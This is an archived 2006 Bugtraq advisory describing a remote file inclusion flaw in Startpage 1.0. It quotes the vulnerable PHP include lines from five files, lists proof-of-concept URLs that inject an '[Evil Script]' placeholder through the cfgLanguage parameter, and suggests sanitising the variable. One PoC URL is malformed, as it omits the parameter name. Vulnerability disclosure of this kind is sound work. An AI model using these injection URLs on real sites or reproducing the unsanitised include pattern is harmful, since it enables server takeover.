lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 10 Aug 2006 20:53:46 -0000
From: sh3ll@...ll.ir
To: bugtraq@...urityfocus.com
Subject: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion
--------------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/08/10
HomePage : http://www.sh3ll.ir
Contact  : sh3ll[at]sh3ll[dot]ir
--------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Startpage
version     : 1.0
Venedor     : http://matthijs.draijer.org
Class       : Remote File Inclusion
Risk        : High
Summary     : 
Startpage v1.0 Is a Script Which Shows Your Favortie Links.
--------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.
----------------------------------------edit.php--------------------------------------------
...
<?php
        include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------functions.php---------------------------------------
...
<?php
        include ("config.php");
	include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------new.php---------------------------------------------
...
<?php
        include ("config.php");
        include ("functions.php");
        include ("PageTop.php");
        include ("language_$cfgLanguage.php");
        connect_db();
        ?>
...
----------------------------------------PageBottom.php--------------------------------------
...
<?php
        include ("config.php");
        include ("language_$cfgLanguage.php");
        ?>
...
----------------------------------------PageTop.php-----------------------------------------
...
<?php
        include ("config.php");
        include ("language_$cfgLanguage.php");
        ?>
...
--------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[Startpage]/edit.php?=[Evil Script]
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php 
& PageTop.php
--------------------------------------------------------------------------------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

Powered by blists - more mailing lists